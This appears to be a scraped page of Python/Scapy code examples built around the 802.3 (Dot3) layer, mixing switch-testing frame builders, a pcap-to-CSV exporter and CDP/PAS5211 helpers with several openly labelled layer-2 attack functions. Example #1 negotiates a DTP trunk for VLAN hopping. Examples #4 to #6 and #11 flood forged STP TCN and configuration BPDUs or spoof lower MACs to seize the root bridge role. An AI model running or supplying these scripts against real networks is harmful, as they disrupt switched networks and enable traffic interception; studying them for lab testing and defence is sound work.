Пример #1
0
def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):
    print("Trying to negotiate a trunk on interface %s" % iface)
    p = Dot3(src=mymac,
             dst="01:00:0c:cc:cc:cc") / LLC() / SNAP() / DTP(tlvlist=[
                 DTPDomain(),
                 DTPStatus(),
                 DTPType(),
                 DTPNeighbor(neighbor=mymac)
             ])
    sendp(p)
Пример #2
0
def protocol_frame(protocol, source='unicast', vlans=[]):
    """ Create a frame that has the minimum fields to be recognized as a determined protocol.
	    It's not intended to be a valid PDU, only to be seen as one by the switch filter.
	@param protocol          Protocol name. Valid options are:
	                         * stp, lldp, lacp, marker, oam, lbd, cdp, pagp, udld, vtp, pvst, dtp, gvrp, gmrp, dot1x
	@param source            Name of the source interface, or source MAC address.
	                         * 'unicast' to use a random unicast address as source MAC.
	@param vlans             [optional] List of VLAN Tags.
	                         List can be composed by single integer representing VLAN, or tuple (int, int) for VLAN and prio.
	                         Ex: [(100, 3), 20] will add two tags, one with VLAN 100, prio 3 and another with VLAN 20, prio 0.
	"""
    if protocol not in pdu_info:
        raise Exception("Unknown protocol name {0}".format(protocol))

    info = pdu_info[protocol]

    # Define source MAC address.
    if "eth" in source:
        src_mac = str(mac_address(source))
    elif source == 'unicast':
        src_mac = str(random_mac('unicast'))
    else:
        src_mac = str(source)
    if protocol == 'eaps':
        src_mac = "00:e0:2b:00:00:01"

    if 'type' in info or vlans:
        pdu = Ether(src=src_mac, dst=info['mac'])
        for v in vlans:
            if type(v) == int:
                pdu = pdu / Dot1Q(vlan=v)
            elif type(v) == tuple:
                pdu = pdu / Dot1Q(vlan=v[0], prio=v[1])
            else:
                raise TypeError(
                    "Expected list with int or tuple for VLANs parameter.")
        if 'type' in info:
            pdu.lastlayer().type = info['type']
    else:
        pdu = Dot3(src=src_mac, dst=info['mac'])

    pdu = pdu / info['load']

    # Process PDU so length field is correctly calculated.
    pdu = Ether(str(pdu))

    # Add Padding and return.
    padding = 64 - len(pdu) + 4  #FCS
    if padding > 0:
        pdu = pdu / Padding(load='\0' * padding)

    return pdu
Пример #3
0
def constructPAS5211Frames(msg, seq, src_mac, dst_mac, channel_id=-1,
                           onu_id=-1, onu_session_id=-1):

    assert isinstance(msg, PAS5211Msg)
    opcode = 0x3000 | msg.opcode

    inner_msg = PAS5211MsgHeader(
        sequence_number=seq,
        opcode=opcode,
        channel_id=channel_id,
        onu_id=onu_id,
        onu_session_id=onu_session_id
    ) / msg

    size = len(inner_msg)
    frame_body = PAS5211FrameHeader(size=size) / inner_msg
    frame = Dot3(src=src_mac, dst=dst_mac) / frame_body

    return frame
Пример #4
0
def run(interface):
    """
    This function launch STP TCN ATTACK
    :param interface: interface to be launched the attack
    :type interface: str
    """
    # sniff to found a stp packet
    pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)

    # Look for a STP packet to use a lower priority
    pk_list = {x: y for x, y in pkt.sessions().iteritems() if "Other" in x}
    item = pk_list.popitem()
    pkts = item[1]

    for x in pkts:
        if STP in x:
            STP_packet = x
            break

    myMAC = get_if_hwaddr(interface)

    root_id = STP_packet.rootid - 1

    bridge_id = STP_packet.bridgeid - 1

    p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC)
    p_llc = LLC()

    p_stp = STP(bpdutype=0x00,
                bpduflags=0x01,
                portid=0x8002,
                rootmac=myMAC,
                bridgemac=myMAC,
                rootid=root_id,
                bridgeid=bridge_id)

    pkt = p_ether / p_llc / p_stp  # STP packet structure

    try:
        while 1:
            sendp(pkt, iface=interface, verbose=0)
    except KeyboardInterrupt:
        pass
Пример #5
0
def run(inter):
    """
    This function launch STP TCN ATTACK
    :param inter: interface to be launched the attack
    :type inter: str
    """

    interface = str(inter[0])
    if len(interface) > 0:
        try:
            while 1:
                # dst=Ethernet Multicast address used for spanning tree protocol
                srcMAC = str(RandMAC())     # Random MAC in each iteration
                p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
                p_llc = LLC()
                p_stp = STP(bpdutype=0x80)   # TCN packet
                pkt = p_ether/p_llc/p_stp   # STP packet structure

                sendp(pkt, iface=interface, verbose=0)

        except KeyboardInterrupt:
            pass
Пример #6
0
def run(inter):
    """
    This function launch STP CONF ATTACK
    :param inter: interface to be launched the attack
    :type inter: str
    """

    interface = str(inter[0])
    if len(interface) > 0:
        try:

            while 1:
                # Root Identifier 8 bytes (MAC and root priority)

                srcMAC = str(RandMAC())  # Random MAC in each iteration
                root_prior = int(RandInt()) % 65536  # 2 bytes

                # Brigde Identifier (mac and brigde priority)
                brigde_prior = int(RandInt()) % 65536  # 2 bytes

                # dst=Ethernet Multicast address used for spanning tree protocol
                p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
                p_llc = LLC()

                p_stp = STP(bpdutype=0x00,
                            bpduflags=0x01,
                            portid=0x8002,
                            rootmac=srcMAC,
                            bridgemac=srcMAC,
                            rootid=root_prior,
                            bridgeid=brigde_prior)  # Conf packet

                pkt = p_ether / p_llc / p_stp  # STP packet structure

                sendp(pkt, iface=interface, verbose=0)

        except KeyboardInterrupt:
            pass
Пример #7
0
def l2_frame_from_to(source, destination, vlans = [], seq = 10, size = 64, pattern = '\0', framing = "Ethernet II"):
	""" Create a frame using interfaces MACs.
	@param source            Name of the source interface, or source MAC address.
	                         It can also be:
	                         * 'unicast' to use a random unicast address as source MAC.
	@param destination       Name of the destination interface, or destination MAC address.
	                         It can also be:
	                         * 'broadcast' to use 'FF:FF:FF:FF:FF:FF' as destination MAC.
	                         * 'multicast' to use a random multicast address as destination MAC.
	                         * 'unicast' to use a random unicast address as destination MAC.
	@param vlans             [optional] List of VLAN Tags.
	                         List can be composed by single integer representing VLAN, or tuple (int, int) for VLAN and prio.
	                         Ex: [(100, 3), 20] will add two tags, one with VLAN 100, prio 3 and another with VLAN 20, prio 0.
	@param seq               [optional] Number of sequence
	@param size              [optional] Size of created frame. A padding based on 'pattern' is added to complete
	                         the frame until size is reached (counting 4 bytes of FCS)
	@param pattern           [optional] Pattern string used to fill payload. Default is '\0'.
	                         * 'random' to fill the payload with random bytes.
	@param framing           [optional] Type of frame:
	                         * "Ethernet II" : Ethertype > 1535 and hold information about next layer.
	                         * "802.3" : Ethertype <= 1500 represent payload length. Next header is LLC.
	"""

	if "eth" in destination:
		dst_mac = mac_address(destination)
	elif destination == 'broadcast':
		dst_mac = 'FF:FF:FF:FF:FF:FF'
	elif destination == 'multicast':
		dst_mac = str(random_mac('multicast'))
	elif destination == 'unicast':
		dst_mac = str(random_mac('unicast'))
	else:
		dst_mac = str(destination)

	if "eth" in source:
		src_mac = str(mac_address(source))
	elif source == 'unicast':
		src_mac = str(random_mac('unicast'))
	else:
		src_mac = str(source)

	# When the next layer is Dot1Q, Dot3 will be evaluated as Ether anyway (0x8100 > 1536),
	# To keep consistency between creation and dissection, already use Ether even for 802.3 framing.
	# The difference will be made as Dot1Q will be followed by LLC header.

	if framing == "Ethernet II" or vlans:
		frame = Ether(src = src_mac, dst = dst_mac)
	elif framing == "802.3":
		frame = Dot3(src = src_mac, dst = dst_mac)
	else:
		raise ValueError("Excpected only 'Ethernet II' or '802.3' as framing types.")

	for v in vlans:
		if type(v) == int:
			frame = frame / Dot1Q(vlan = v)
		elif type(v) == tuple:
			frame = frame / Dot1Q(vlan = v[0], prio = v[1])
		else:
			raise TypeError("Expected list with int or tuple for VLANs parameter.")

	if framing == "802.3":
		frame = frame / LLC() / SNAP()

	if seq != None:
		frame = frame / L2T(l2t_seq = seq)

	return add_payload(frame, size, pattern)
Пример #8
0
def render_csv_row(pkt_sh, pkt_sc, fh_csv):
    """Write one packet entry into the CSV file.
	pkt_sh is the PyShark representation of the packet

	pkt_sc is a 'bytes' representation of the packet as returned from
	scapy's RawPcapReader

	fh_csv is the csv file handle
	"""
    ether_pkt_sc = Ether(pkt_sc)
    if ether_pkt_sc.type != 0x800 and ether_pkt_sc.type != 0x8100:
        print('Ignoring non-IP packet')
        return False
    #extrackt source and destination
    l2_dst = ether_pkt_sc.dst
    l2_src = ether_pkt_sc.src

    dot3_pkt_sc = Dot3(pkt_sc)
    l2_len = dot3_pkt_sc.len

    #check if fame is iee802.1q
    if ether_pkt_sc.type == 0x8100:
        # extrackt vlan
        dot1q_pkt_sc = Dot1Q(pkt_sc)
        l2_prio = dot1q_pkt_sc.prio
        l2_id = dot1q_pkt_sc.id
        l2_vlan = dot1q_pkt_sc.vlan
    else:
        l2_prio = 0
        l2_id = 0
        l2_vlan = 0

    #	 0                   1                   2                   3
    # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
    #+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    #| PRIO|I|          VLAN         |              TYPE             |
    #+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    # Each line of the CSV has this format
    fmt = '{0}|{1}|{2}|{3}|{4}|{5}|{6}|{7}'
    #       |   |   |   |   |   |   |   |
    #       |   |   |   |   |   |   |   |
    #       |   |   |   |   |   |   |   |
    #       |   |   |   |   |   |   |   |
    #       |   |   |   |   |   |   |   o--------------> {7}  idfield
    #       |   |   |   |   |   |   o------------------> {6}  prioirty
    #       |   |   |   |   |   o----------------------> {5}  vlan id
    #       |   |   |   |   o--------------------------> {4]  frame lenght
    #       |   |   |   o------------------------------> {3}  source mac
    #       |   |   o----------------------------------> {2}  destination mac
    #       |   o--------------------------------------> {1}  time
    #       o------------------------------------------> {0}  frame number

    print(
        fmt.format(
            pkt_sh.no,  # {0}
            pkt_sh.time,  # {1}
            l2_dst,  # {2}
            l2_src,  # {3}
            l2_len,  # {4}
            l2_vlan,  # {5}
            l2_prio,  # {6}
            l2_id),  # {7}
        file=fh_csv)

    return True
Пример #9
0
 def create_base_packet(self):
     packet = (
         Dot3(src=self.interface.remote_mac, dst="01:00:0c:cc:cc:cc") /
         LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP() / CDPv2_HDR())
     return packet
Пример #10
0
 def send(self, dst_mac, packet):
     sendp(Dot3(src=self._addr, dst=dst_mac) / packet,
           iface=self._ifname_,
           verbose=False)
Пример #11
0
def run(interface):
    """
    This function launch STP ROOT ROLE  ATTACK
    :param interface: interface to be launched the attack
    :type interface: str
    """
    # sniff to found a stp packet
    pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)

    # Look for a STP packet to use a lower priority
    pk_list = {x: y for x, y in pkt.sessions().iteritems() if "Other" in x}
    item = pk_list.popitem()
    pkts = item[1]

    for x in pkts:
        if STP in x:
            STP_packet = x
            break

    #myMAC = get_if_hwaddr(interface)

    #root_id = STP_packet.rootid - 1
    #bridge_id = STP_packet.bridgeid - 1

    rootMAC = STP_packet.rootmac
    bridgeMAC = STP_packet.bridgemac
    aux = False
    newMAC = ''

    rootMAC = rootMAC[::-1]

    for x in range(len(rootMAC)):
        if (rootMAC[x] in '123456789abcdef') and not aux:
            n = int(rootMAC[x], 16)
            n -= 1
            n = format(n, 'x')
            newMAC += n
            aux = True
        else:
            newMAC += rootMAC[x]
    rootMAC = newMAC[::-1]

    newMAC = ''
    aux = False
    bridgeMAC = bridgeMAC[::-1]
    for x in range(len(bridgeMAC)):
        if (bridgeMAC[x] in '123456789abcdef') and not aux:
            n = int(bridgeMAC[x], 16)
            n -= 1
            n = format(n, 'x')
            newMAC += n
            aux = True
        else:
            newMAC += bridgeMAC[x]
    bridgeMAC = newMAC[::-1]
    #brigdemac
    root_id = STP_packet.rootid
    bridge_id = STP_packet.bridgeid
    p_ether = Dot3(dst="01:80:c2:00:00:00", src=bridgeMAC)
    p_llc = LLC()

    p_stp = STP(bpdutype=0x00,
                bpduflags=0x01,
                portid=0x8002,
                rootmac=rootMAC,
                bridgemac=bridgeMAC,
                rootid=root_id,
                bridgeid=bridge_id)

    pkt = p_ether / p_llc / p_stp  # STP packet structure
    try:
        while 1:
            pkt_sniff = srp1(pkt, iface=interface, verbose=0, timeout=2)
            if pkt_sniff is not None:
                if STP in pkt_sniff:

                    if pkt_sniff[Dot3].src != rootMAC:

                        p_stp_ack = STP(bpdutype=0x00,
                                        bpduflags=0x81,
                                        portid=0x8002,
                                        rootmac=rootMAC,
                                        bridgemac=bridgeMAC,
                                        rootid=root_id,
                                        bridgeid=bridge_id)
                        pkt_ack = p_ether / p_llc / p_stp_ack
                        sendp(pkt_ack, iface=interface, verbose=0)

    except KeyboardInterrupt:
        pass